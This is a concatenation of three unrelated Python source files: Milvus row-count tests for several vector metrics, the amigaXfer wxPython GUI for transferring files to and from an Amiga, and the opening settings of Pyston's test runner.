'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
class TestTableCountJAC:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_jaccard_index_params(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_table_rows_count(self, connect, jac_table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(table_name=jac_table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(jac_table)
assert res == nb
def test_table_rows_count_after_index_created(self, connect, jac_table, get_jaccard_index_params):
'''
target: test get_table_row_count, after index have been created
method: add vectors in db, and create index, then calling get_table_row_count with correct params
expected: the count is equal to the length of vectors
'''
nb = 100
index_params = get_jaccard_index_params
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(table_name=jac_table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(jac_table, index_params)
status, res = connect.get_table_row_count(jac_table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, jac_table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(jac_table)
def test_table_rows_count_no_vectors(self, connect, jac_table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str("test_table")
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(jac_table)
assert res == 0
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of JACCARD
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
tmp, vectors = gen_binary_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str('test_table_rows_count_multi_tables')
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.JACCARD}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
class TestTableCountHAM:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_hamming_index_params(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_table_rows_count(self, connect, ham_table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(table_name=ham_table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(ham_table)
assert res == nb
def test_table_rows_count_after_index_created(self, connect, ham_table, get_hamming_index_params):
'''
target: test get_table_row_count, after index have been created
method: add vectors in db, and create index, then calling get_table_row_count with correct params
expected: the count is equal to the length of vectors
'''
nb = 100
index_params = get_hamming_index_params
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(table_name=ham_table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(ham_table, index_params)
status, res = connect.get_table_row_count(ham_table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, ham_table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(ham_table)
def test_table_rows_count_no_vectors(self, connect, ham_table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str("test_table")
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(ham_table)
assert res == 0
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of HAMMING
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
tmp, vectors = gen_binary_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str('test_table_rows_count_multi_tables')
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.HAMMING}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
class TestTableCountTANIMOTO:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_tanimoto_index_params(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == IndexType.IVFLAT or request.param["index_type"] == IndexType.FLAT:
return request.param
else:
pytest.skip("Skip index Temporary")
def test_table_rows_count(self, connect, tanimoto_table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
tmp, vectors = gen_binary_vectors(nb, dim)
res = connect.add_vectors(table_name=tanimoto_table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(tanimoto_table)
assert res == nb
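# Note (added): the connect/table/ip_table/jac_table/ham_table/tanimoto_table and
# dis_connect fixtures are provided by the suite's conftest.py, which is not shown
# here, so the exact invocation is an assumption; something along the lines of
#
#   pytest test_table_count.py -v
#
# run against a reachable Milvus instance is expected.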
|
DosFrame.py
|
import wx
import os
import re
import time
import threading
from DosLibrary import DosLibrary
from DosUtils import DosUtils
class DosFrame(wx.Frame):
def __init__(self):
self.endcallback = None
self.ser = None
self.amiga = None
self.execlib = None
self.doslib = None
self.snip = None
self.abort = threading.Event()
self.wantclose = False
self.busy = False
self.bufaddr = None
self.delay = 0
self.delaydisk = 200
self.timerperiod = 50
super().__init__(None, id=wx.ID_ANY, title=u"amigaXfer DOS Tool", pos=wx.DefaultPosition, size=wx.Size(600, 300), style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)
self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)
self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DLIGHT))
bSizer7 = wx.BoxSizer(wx.VERTICAL)
self.m_amigapathmsg = wx.StaticText(self, wx.ID_ANY, u"Amiga path", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_amigapathmsg.Wrap(-1)
bSizer7.Add(self.m_amigapathmsg, 0, wx.ALL, 5)
self.m_amigapath = wx.TextCtrl(self, wx.ID_ANY, u"RAM:", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_amigapath.SetFont(wx.Font(wx.NORMAL_FONT.GetPointSize(), wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, wx.EmptyString))
bSizer7.Add(self.m_amigapath, 0, wx.ALL | wx.EXPAND, 5)
wSizer9 = wx.WrapSizer(wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS)
self.m_fromamiga = wx.Button(self, wx.ID_DOWN, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0)
wSizer9.Add(self.m_fromamiga, 0, wx.ALL, 5)
self.m_xfermsg = wx.StaticText(self, wx.ID_ANY, u"Xfer", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_xfermsg.Wrap(-1)
wSizer9.Add(self.m_xfermsg, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.m_toamiga = wx.Button(self, wx.ID_UP, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0)
wSizer9.Add(self.m_toamiga, 0, wx.ALL, 5)
bSizer7.Add(wSizer9, 0, wx.ALIGN_CENTER_HORIZONTAL, 5)
self.m_localpathmsg = wx.StaticText(self, wx.ID_ANY, u"Local path", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_localpathmsg.Wrap(-1)
bSizer7.Add(self.m_localpathmsg, 0, wx.ALL, 5)
self.m_localpath = wx.FilePickerCtrl(self, wx.ID_ANY, wx.EmptyString, u"Select a file", u"", wx.DefaultPosition, wx.DefaultSize, wx.FLP_OPEN | wx.FLP_USE_TEXTCTRL)
bSizer7.Add(self.m_localpath, 0, wx.ALL | wx.EXPAND, 5)
self.m_staticline2 = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)
bSizer7.Add(self.m_staticline2, 0, wx.EXPAND | wx.ALL, 5)
self.m_progress = wx.Gauge(self, wx.ID_ANY, 100, wx.DefaultPosition, wx.DefaultSize, wx.GA_HORIZONTAL | wx.GA_SMOOTH)
self.m_progress.SetValue(0)
bSizer7.Add(self.m_progress, 0, wx.ALL | wx.EXPAND, 5)
gSizer1 = wx.GridSizer(0, 2, 0, 0)
wSizer10 = wx.WrapSizer(wx.HORIZONTAL, wx.WRAPSIZER_DEFAULT_FLAGS)
self.m_status = wx.TextCtrl(self, wx.ID_ANY, u"Init", wx.DefaultPosition, wx.DefaultSize, wx.TE_READONLY)
self.m_status.SetFont(wx.Font(wx.NORMAL_FONT.GetPointSize(), wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, wx.EmptyString))
wSizer10.Add(self.m_status, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.m_overwrite = wx.CheckBox(self, wx.ID_ANY, u"Overwrite", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_overwrite.SetForegroundColour(wx.Colour(255, 0, 0))
wSizer10.Add(self.m_overwrite, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
wSizer10.Add((0, 0), 1, wx.EXPAND, 5)
self.m_timermsg = wx.StaticText(self, wx.ID_ANY, u"Time", wx.DefaultPosition, wx.DefaultSize, 0)
self.m_timermsg.Wrap(-1)
wSizer10.Add(self.m_timermsg, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.m_timer = wx.TextCtrl(self, wx.ID_ANY, u" 0.0s", wx.DefaultPosition, wx.DefaultSize, wx.TE_READONLY)
self.m_timer.SetFont(wx.Font(wx.NORMAL_FONT.GetPointSize(), wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, wx.EmptyString))
maxlen = 7
self.m_timer.SetMaxLength(maxlen)
self.m_timer.SetInitialSize(self.m_timer.GetSizeFromTextSize(self.m_timer.GetTextExtent("A" * maxlen)))
wSizer10.Add(self.m_timer, 0, wx.ALL, 5)
self.m_abort = wx.Button(self, wx.ID_ANY, u"Stop", wx.DefaultPosition, wx.DefaultSize, 0)
wSizer10.Add(self.m_abort, 0, wx.ALL, 5)
self.m_exit = wx.Button(self, wx.ID_ANY, u"Exit", wx.DefaultPosition, wx.DefaultSize, 0)
wSizer10.Add(self.m_exit, 0, wx.ALL, 5)
bSizer7.Add(wSizer10, 0, wx.EXPAND, 5)
self.SetSizer(bSizer7)
self.Layout()
self.Centre(wx.BOTH)
self.m_abort.Bind(wx.EVT_BUTTON, self.onAbortPressed)
self.m_exit.Bind(wx.EVT_BUTTON, self.onExitPressed)
self.m_overwrite.Bind(wx.EVT_CHECKBOX, self.onOverwriteCheckBox)
self.m_toamiga.Bind(wx.EVT_BUTTON, self.onToAmigaPressed)
self.m_fromamiga.Bind(wx.EVT_BUTTON, self.onFromAmigaPressed)
return
def onCloseSetup(self, event):
if event.CanVeto():
event.Veto()
return
def onClose(self, event):
if event.CanVeto():
event.Veto()
if self.wantclose:
return
if self.busy:
print("Window close request while running. Stopping.")
self.wantclose = True
self.Abort()
return
self.UpdateStatus("UserClose")
self.CleanUp()
return
def onTimer(self, event):
value = time.monotonic() - self.timerbase
self.m_timer.ChangeValue(f"{value:6.1F}s")
return
def onExitPressed(self, event):
self.wantclose = True
wx.CallAfter(self.UpdateStatus, "CleanUp")
wx.CallAfter(self.CleanUp)
return
def onAbortPressed(self, event):
print("Stop requested by user.")
self.Abort()
return
def Abort(self):
self.m_abort.Enable(False)
self.abort.set()
return
def onOverwriteCheckBox(self, event):
danger = self.m_overwrite.GetValue()
if danger:
self.fromamigacolor = self.m_fromamiga.GetForegroundColour()
self.toamigacolor = self.m_toamiga.GetForegroundColour()
self.xfermsgcolor = self.m_xfermsg.GetForegroundColour()
self.m_fromamiga.SetForegroundColour(wx.Colour(255, 0, 0))
self.m_toamiga.SetForegroundColour(wx.Colour(255, 0, 0))
self.m_xfermsg.SetForegroundColour(wx.Colour(255, 0, 0))
else:
self.m_fromamiga.SetForegroundColour(self.fromamigacolor)
self.m_toamiga.SetForegroundColour(self.toamigacolor)
self.m_xfermsg.SetForegroundColour(self.xfermsgcolor)
return
def onToAmigaPressed(self, event):
self.Enablement(False)
self.abort.clear()
self.m_abort.Enable(True)
self.UpdateStatus("Start")
self.busy = True
localpath = self.m_localpath.GetPath()
amigapath = self.m_amigapath.GetValue()
overwrite = self.m_overwrite.GetValue()
print(f"Requested Transfer ToAmiga overwrite: {overwrite}, amigapath: {amigapath}, localpath: {localpath}")
self.timerbase = time.monotonic()
self.timer.Start(self.timerperiod)
threading.Thread(target=self.ToAmigaWorker, args=(localpath, amigapath, overwrite)).start()
return
def onFromAmigaPressed(self, event):
self.Enablement(False)
self.abort.clear()
self.m_abort.Enable(True)
self.UpdateStatus("Start")
self.busy = True
localpath = self.m_localpath.GetPath()
amigapath = self.m_amigapath.GetValue()
overwrite = self.m_overwrite.GetValue()
print(f"Requested Transfer FromAmiga overwrite: {overwrite}, amigapath: {amigapath}, localpath: {localpath}")
self.timerbase = time.monotonic()
self.timer.Start(self.timerperiod)
threading.Thread(target=self.FromAmigaWorker, args=(localpath, amigapath, overwrite)).start()
return
def Stop(self):
self.doslib.Delay(self.delay)
self.timer.Stop()
self.busy = False
self.m_abort.Enable(False)
wx.CallAfter(self.UpdateProgressDone)
if self.wantclose:
wx.CallAfter(self.CleanUp)
else:
self.Enablement(True)
return
def ToAmigaWorker(self, localpath, amigapath, overwrite):
wx.CallAfter(self.UpdateProgressPulse)
if not amigapath:
wx.CallAfter(self.UpdateStatus, "DstFile?")
wx.CallAfter(self.Stop)
return
if not ':' in amigapath:
wx.CallAfter(self.UpdateStatus, "DstVol?")
wx.CallAfter(self.Stop)
return
if amigapath[-1] == '/':
amigapath = amigapath[:-1]
wx.CallAfter(self.UpdateStatus, "Checks")
vol = amigapath.split(':')[0]
if vol.upper() == "RAM":
self.delay = 0
else:
self.delay = self.delaydisk
if vol[0:2].upper() == "DF":
#diskchange, as floppies might have been swapped while interrupts disabled
self.dosutil.inhibit(amigapath[0:4], self.doslib.DOSTRUE)
self.dosutil.inhibit(amigapath[0:4], self.doslib.DOSFALSE)
#FIXME: For huge filetransfers, it might make sense not to read the source file all at once.
try:
with open(localpath, "rb") as fh:
data = fh.read()
except:
data = None
if not data:
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
voladdr = self.snip.getaddrstr(vol + ':')
lock = self.doslib.Lock(voladdr, self.doslib.ACCESS_READ)
if not lock:
print("Could not get read lock on volume.")
wx.CallAfter(self.UpdateStatus, "DstVol?")
wx.CallAfter(self.Stop)
return
if not self.doslib.Info(lock, self.bufaddr):
print("Could not Info() lock.")
self.doslib.UnLock(lock)
wx.CallAfter(self.UpdateStatus, "InfoErr.")
wx.CallAfter(self.Stop)
return
self.doslib.UnLock(lock)
diskstate = self.amiga.speek32(self.bufaddr + self.doslib.id_DiskState)
print(f"DiskState: {hex(diskstate)}.")
if diskstate == self.doslib.ID_WRITE_PROTECTED:
print("Disk state ID_WRITE_PROTECTED thus not writable.")
wx.CallAfter(self.UpdateStatus, "WriteProt?")
wx.CallAfter(self.Stop)
return
if diskstate == self.doslib.ID_VALIDATING:
print("Disk state ID_VALIDATING thus not writable.")
wx.CallAfter(self.UpdateStatus, "DskInval?")
wx.CallAfter(self.Stop)
return
if diskstate != self.doslib.ID_VALIDATED:
print(f"Disk state not ID_VALIDATED: {diskstate}")
wx.CallAfter(self.UpdateStatus, "InfoUnk?!")
wx.CallAfter(self.Stop)
return
amigapathaddr = self.snip.getaddrstr(amigapath)
lock = self.doslib.Lock(amigapathaddr, self.doslib.ACCESS_READ)
if lock:
if not self.doslib.Examine(lock, self.bufaddr):
print("Could not Examine() lock.")
self.doslib.UnLock(lock)
wx.CallAfter(self.UpdateStatus, "ExamErr.")
wx.CallAfter(self.Stop)
return
self.doslib.UnLock(lock)
filetype = self.amiga.speek32(self.bufaddr + self.doslib.fib_DirEntryType)
print(f"Filetype: {filetype}")
if (filetype < 0) and (not overwrite):
print("File exists, and overwrite is not enabled.")
wx.CallAfter(self.UpdateStatus, "OverWrit?")
wx.CallAfter(self.Stop)
return
if filetype > 0:
basename = os.path.basename(localpath)
if amigapath[-1] != ":":
amigapath += "/"
amigapath += basename
amigapathaddr = self.snip.getaddrstr(amigapath)
print(f"Target is a dir. New amigapath: {amigapath}")
lock = self.doslib.Lock(amigapathaddr, self.doslib.ACCESS_READ)
if lock:
if not self.doslib.Examine(lock, self.bufaddr):
print("Could not Examine() lock.")
self.doslib.UnLock(lock)
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
self.doslib.UnLock(lock)
filetype = self.amiga.speek32(self.bufaddr + self.doslib.fib_DirEntryType)
print(f"Filetype: {filetype}")
if filetype > 0:
print("Target directory exists, but name inside exists and is not a file.")
print(f"path: {localpath}")
wx.CallAfter(self.UpdateStatus, "LNotFile?")
wx.CallAfter(self.Stop)
return
if not overwrite:
print("File exists, and overwrite is not enabled.")
wx.CallAfter(self.UpdateStatus, "OverWrit?")
wx.CallAfter(self.Stop)
return
print(f"Amiga path: {amigapath}, Local path: {localpath}")
if self.abort.is_set():
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
dosfh = self.doslib.Open(amigapathaddr, self.doslib.MODE_NEWFILE)
print(f"dosfh: {hex(dosfh)}")
if not dosfh:
wx.CallAfter(self.UpdateStatus, "DstFile?")
wx.CallAfter(self.Stop)
return
blocks = len(data) // self.bufsize
if len(data) % self.bufsize:
blocks += 1
wx.CallAfter(self.UpdateProgressRange, blocks)
block = 0
wx.CallAfter(self.UpdateProgressValue, 0)
for offset in range(0, len(data), self.bufsize):
remaining = len(data) - offset
stepsize = min(remaining, self.bufsize)
print(f"transferring {hex(stepsize)} at offset {hex(offset)} remaining {hex(remaining)}")
wx.CallAfter(self.UpdateStatus, "Xfer+CRC")
self.snip.verifiedwritemem(self.bufaddr, data[offset:offset + stepsize])
if self.abort.is_set():
success = self.doslib.Close(dosfh)
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
wx.CallAfter(self.UpdateStatus, "Write")
returnedLength = self.doslib.Write(dosfh, self.bufaddr, stepsize)
if returnedLength != stepsize:
print(f"returnedLength: {hex(returnedLength)}")
print("Error: size written != requested length.")
wx.CallAfter(self.UpdateStatus, "IOErr.")
success = self.doslib.Close(dosfh)
wx.CallAfter(self.Stop)
block += 1
wx.CallAfter(self.UpdateProgressValue, block)
if self.abort.is_set():
success = self.doslib.Close(dosfh)
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
print("Closing file.")
wx.CallAfter(self.UpdateStatus, "Close")
success = self.doslib.Close(dosfh)
print("Transfer end.")
wx.CallAfter(self.UpdateStatus, "Done.")
wx.CallAfter(self.Stop)
return
def FromAmigaWorker(self, localpath, amigapath, overwrite):
wx.CallAfter(self.UpdateProgressPulse)
if localpath[-1] == '/' or localpath[-1] == '\\':
localpath = localpath[:-1]
if not amigapath or amigapath[-1] == ':' or amigapath[-1] == '/':
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
if amigapath[0:4].upper() == "RAM:":
self.delay = 0
else:
self.delay = self.delaydisk
if amigapath[0:2].upper() == "DF":
#diskchange, as floppies might have been swapped while interrupts disabled
self.dosutil.inhibit(amigapath[0:4], self.doslib.DOSTRUE)
self.dosutil.inhibit(amigapath[0:4], self.doslib.DOSFALSE)
if os.path.exists(localpath) and not os.path.isfile(localpath):
if not os.access(localpath, os.W_OK):
wx.CallAfter(self.UpdateStatus, "LDirPerm?")
print("Target directory is not writable.")
wx.CallAfter(self.Stop)
return
else:
basename = re.split(':|/', amigapath)[-1]
localpath = os.path.join(localpath, basename)
if os.path.exists(localpath):
if os.path.isfile(localpath):
if not os.access(localpath, os.W_OK):
print("Target is not writable.")
wx.CallAfter(self.UpdateStatus, "LFilePerm?")
wx.CallAfter(self.Stop)
return
elif not overwrite:
print("File exists, and overwrite is not enabled.")
wx.CallAfter(self.UpdateStatus, "OverWrit?")
wx.CallAfter(self.Stop)
return
else:
print("Target directory exists, but name inside exists and is not a file.")
print(f"path: {localpath}")
wx.CallAfter(self.UpdateStatus, "LNotFile?")
wx.CallAfter(self.Stop)
return
print(f"Amiga path: {amigapath}, Local path: {localpath}")
try:
fh = open(localpath, "wb")
except:
fh = None
if not fh:
print("Could not open destination file.")
wx.CallAfter(self.UpdateStatus, "DstFile?")
wx.CallAfter(self.Stop)
return
amigapathaddr = self.snip.getaddrstr(amigapath)
lock = self.doslib.Lock(amigapathaddr, self.doslib.ACCESS_READ)
if not lock:
print("Could not Lock() source file.")
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
if not self.doslib.Examine(lock, self.bufaddr):
print("Could not Examine() lock.")
self.doslib.UnLock(lock)
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
self.doslib.UnLock(lock)
length = self.amiga.peek32(self.bufaddr + self.doslib.fib_Size)
print(f"Source file length: {length}")
if self.abort.is_set():
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
dosfh = self.doslib.Open(amigapathaddr, self.doslib.MODE_OLDFILE)
if not dosfh:
print("Could not Open() source file.")
wx.CallAfter(self.UpdateStatus, "SrcFile?")
wx.CallAfter(self.Stop)
return
blocks = length // self.bufsize
if length % self.bufsize:
blocks += 1
wx.CallAfter(self.UpdateProgressRange, blocks)
block = 0
wx.CallAfter(self.UpdateProgressValue, block)
for offset in range(0, length, self.bufsize):
wx.CallAfter(self.UpdateStatus, "Read")
remaining = length - offset
stepsize = min(remaining, self.bufsize)
print(f"transferring {hex(stepsize)} at offset {hex(offset)} remaining {hex(remaining)}")
returnedLength = self.doslib.Read(dosfh, self.bufaddr, self.bufsize)
if returnedLength != stepsize:
print(f"returnedLength: {hex(returnedLength)}")
print("Error: size read != requested length.")
self.doslib.Close(dosfh)
wx.CallAfter(self.UpdateStatus, "IOErr.")
wx.CallAfter(self.Stop)
return
if self.abort.is_set():
success = self.doslib.Close(dosfh)
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
wx.CallAfter(self.UpdateStatus, "Xfer+CRC")
fh.write(self.snip.verifiedreadmem(self.bufaddr, returnedLength))
block += 1
wx.CallAfter(self.UpdateProgressValue, block)
if self.abort.is_set():
success = self.doslib.Close(dosfh)
wx.CallAfter(self.UpdateStatus, "UserStop.")
print("User stopped.")
wx.CallAfter(self.Stop)
return
print("Closing file.")
wx.CallAfter(self.UpdateStatus, "Close")
fh.close()
success = self.doslib.Close(dosfh)
print("Transfer end.")
wx.CallAfter(self.UpdateStatus, "Done.")
wx.CallAfter(self.Stop)
return
def UpdateStatus(self, status):
self.m_status.ChangeValue(status)
return
def UpdateProgressValue(self, value):
self.m_progress.SetValue(value)
return
def UpdateProgressRange(self, value):
self.m_progress.SetRange(value)
return
def UpdateProgressPulse(self):
self.m_progress.Pulse()
return
def UpdateProgressDone(self):
maxval = self.m_progress.GetRange()
self.m_progress.SetValue(maxval)
return
def Enablement(self, enable):
self.m_exit.Enable(enable)
self.m_overwrite.Enable(enable)
self.m_fromamiga.Enable(enable)
self.m_toamiga.Enable(enable)
self.m_localpath.Enable(enable)
self.m_amigapath.Enable(enable)
return
def DosSetup(self, endcallback, ser, amiga, execlib, snip):
self.Bind(wx.EVT_CLOSE, self.onCloseSetup)
self.m_status.ChangeValue(u'Setup')
self.endcallback = endcallback
self.ser = ser
self.amiga = amiga
self.execlib = execlib
self.snip = snip
self.wantclose = False
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.onTimer, self.timer)
self.Enablement(False)
self.m_abort.Enable(False)
self.abort.clear()
threading.Thread(target=self.DosSetupWorker).start()
return
def DosSetupWorker(self):
wx.CallAfter(self.UpdateStatus, "Buffer")
avail = self.execlib.AvailMem(self.execlib.MEMF_PUBLIC)
largest = self.execlib.AvailMem(self.execlib.MEMF_LARGEST | self.execlib.MEMF_PUBLIC)
print(f"MEMF_PUBLIC avail: {hex(avail)}, largest: {hex(largest)}")
if avail > 1024 * 1024 * 2 and largest >= 256 * 1024:
self.bufsize = 256 * 1024
elif avail > 1024 * 1024 and largest >= 128 * 1024:
self.bufsize = 128 * 1024
elif avail > 512 * 1024 and largest >= 64 * 1024:
self.bufsize = 64 * 1024
elif avail > 256 * 1024 and largest >= 16 * 1024:
self.bufsize = 16 * 1024
elif largest > 4096:
self.bufsize = 4096
else:
print("RAM is too low, bailing out.")
wx.CallAfter(self.DosSetupFail)
return
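# Worked example (added comment): with, say, 1.5 MB of MEMF_PUBLIC memory free and a
# largest contiguous block of 300 KB, the second branch applies and a 128 KB transfer
# buffer is chosen; setup only fails when no block larger than 4 KB is available.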
print(f"Allocating bufsize {hex(self.bufsize)}")
self.bufaddr = self.execlib.AllocMem(self.bufsize, self.execlib.MEMF_PUBLIC)
print(f"Allocated buffer @ {hex(self.bufaddr)}")
dosname = self.snip.getaddrstr("dos.library")
self.dosbase = self.execlib.OldOpenLibrary(dosname)
if not self.dosbase:
            wx.CallAfter(self.UpdateStatus, "NoDOS?!")
            wx.CallAfter(self.DosSetupFail)
            return
self.doslib = DosLibrary(debugger=self.amiga, base=self.dosbase)
self.dosutil = DosUtils(debugger=self.amiga, execlib=self.execlib, doslib=self.doslib, snippets=self.snip)
wx.CallAfter(self.DosSetupDone)
return
def DosSetupFail(self):
wx.CallAfter(self.endcallback)
return
def DosSetupDone(self):
wx.CallAfter(self.UpdateStatus, "Ready.")
wx.CallAfter(self.Enablement, True)
self.Unbind(wx.EVT_CLOSE, handler=self.onCloseSetup)
self.Bind(wx.EVT_CLOSE, self.onClose)
return
def CleanUp(self):
self.Enablement(False)
threading.Thread(target=self.CleanUpWorker).start()
return
def CleanUpWorker(self):
print("CleanUp start.")
self.execlib.FreeMem(self.bufaddr, self.bufsize)
self.execlib.CloseLibrary(self.dosbase)
print("CleanUp done.")
wx.CallAfter(self.endcallback)
return
|
tester.py
|
# Copyright (c) 2014-2016 Dropbox, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env python
import Queue
import argparse
import cPickle
import datetime
import functools
import glob
import os
import re
import resource
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
NUM_THREADS = 1
IMAGE = "pyston_dbg"
KEEP_GOING = False
FN_JUST_SIZE = 20
EXTRA_JIT_ARGS = []
TIME_LIMIT = 25
TESTS_TO_SKIP = []
EXIT_CODE_ONLY = False
SKIP_FAILING_TESTS = False
VERBOSE = 1
DISPLAY_SKIPS = False
DISPLAY_SUCCESSES = True
def success_message(msg):
if DISPLAY_SUCCESSES:
return msg
return ""
PYTHONIOENCODING = 'utf-8'
# For fun, can test pypy.
# Tough because the tester will check to see if the error messages are exactly the
# same as the system CPython, but the error messages change over micro CPython versions.
# Pyston compile-time checks the system CPython version to try to give compatible error messages.
TEST_PYPY = 0
def set_ulimits():
# Guard the process from running too long with a hard rlimit.
# But first try to kill it after a second with a SIGALRM, though that's catchable/clearable by the program:
signal.alarm(TIME_LIMIT)
